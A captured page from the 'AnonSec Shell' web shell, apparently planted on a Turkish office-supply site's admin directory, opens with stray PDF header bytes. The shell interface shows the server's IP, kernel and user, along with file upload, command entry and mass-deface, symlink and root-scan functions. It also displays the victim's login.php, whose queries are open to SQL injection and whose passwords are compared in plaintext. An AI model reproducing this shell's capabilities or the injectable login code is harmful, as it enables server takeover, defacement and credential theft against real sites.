%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.216.24   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/public_html/admin/login.php
<?php
session_start();
$passwordwrong = "0";
$nomember = "0";


include_once 'lib/connection.php';

if(isset($_SESSION['login']) && isset($_SESSION['staffid'])){
	$staffid = $_SESSION['staffid'];
	$_SESSION['login'] = "yes";
	$result = $ceha->query("SELECT * FROM tbl_admin WHERE id='$staffid' and active=1");
	$staffinfo = $result->fetch_array();
	$_SESSION['staffid'] = $staffinfo['id'];
	$_SESSION['staffemail'] = $staffinfo['email'];
	
	header("location:index.php");
}else if((isset($_POST['email']))&&(isset($_POST['password']))){
		$email = $_POST['email'];
		$password = $_POST['password'];
		$result = $ceha->query("SELECT * FROM tbl_admin WHERE email='$email' and active=1");
		$staffinfo = $result->fetch_array();
	
		if($result->num_rows == 1){
			if($password == $staffinfo['password']){
				$_SESSION['login'] = "yes";
				$_SESSION['staffid'] = $staffinfo['id'];
				$_SESSION['staffemail'] = $staffinfo['email'];
				
				header("location:index.php");
			}else{
				$passwordwrong = "1";
			}
		}else{
			$nomember = "1";
		}
}else{
	$message = "Giriş Başarısız...";
}

?>
<!DOCTYPE html>
<html lang="tr">

<head>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
		
   		<base href="/admin/">
  <title>Ceha Büro Admin</title>
  <!-- base:css -->
  <link rel="stylesheet" href="vendors/mdi/css/materialdesignicons.min.css">
  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
  <!-- endinject -->
  <!-- plugin css for this page -->
  <!-- End plugin css for this page -->
  <!-- inject:css -->
  <link rel="stylesheet" href="css/vertical-layout-light/style.css">
  <!-- endinject -->
  <link rel="shortcut icon" href="images/favicon.png" />
</head>

<body>
  <div class="container-scroller">
    <div class="container-fluid page-body-wrapper full-page-wrapper">
      <div class="content-wrapper d-flex align-items-center auth px-0">
        <div class="row w-100 mx-0">
          <div class="col-lg-4 mx-auto">
            <div class="auth-form-light text-left py-5 px-4 px-sm-5 border">
              <div class="brand-logo">
                <img src="images/logo.svg" alt="logo">
              </div>
              <h4>Merhaba!</h4>
              <h6 class="font-weight-light">Lütfen giriş yapınız.</h6>
              <form action="login.php" method="post" class="pt-3">
                <div class="form-group">
                  <input type="email" name="email" class="form-control form-control-lg" id="exampleInputEmail1" placeholder="E-posta">
                </div>
                <div class="form-group">
                  <input type="password" name="password" class="form-control form-control-lg" id="exampleInputPassword1" placeholder="Şifre">
                </div>
                <div class="mt-3">
                    <input type="submit" value="Giriş" class="btn btn-block btn-primary btn-lg font-weight-medium auth-form-btn">
                </div>
                <div class="text-center mt-4 font-weight-light">
					<?php if($passwordwrong == "1"){ ?>
						<div class="alert alert-danger" role="alert">Hatalı Şifre!</div>
					<?php }else if($nomember == "1"){ ?>
						<div class="alert alert-danger" role="alert">Üye Bulunamadı!</div>
					<?php }else if(!isset($message)){ ?>
						<div class="alert alert-danger" role="alert">Giriş Başarısız!</div>
					<?php } ?>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
      <!-- content-wrapper ends -->
    </div>
    <!-- page-body-wrapper ends -->
  </div>
  <!-- container-scroller -->
  <!-- base:js -->
  <script src="vendors/js/vendor.bundle.base.js"></script>
  <!-- endinject -->
  <!-- inject:js -->
  <script src="js/off-canvas.js"></script>
  <script src="js/hoverable-collapse.js"></script>
  <script src="js/template.js"></script>
  <script src="js/settings.js"></script>
  <script src="js/todolist.js"></script>
  <!-- endinject -->
</body>

</html>

Anon7 - 2022
AnonSec Team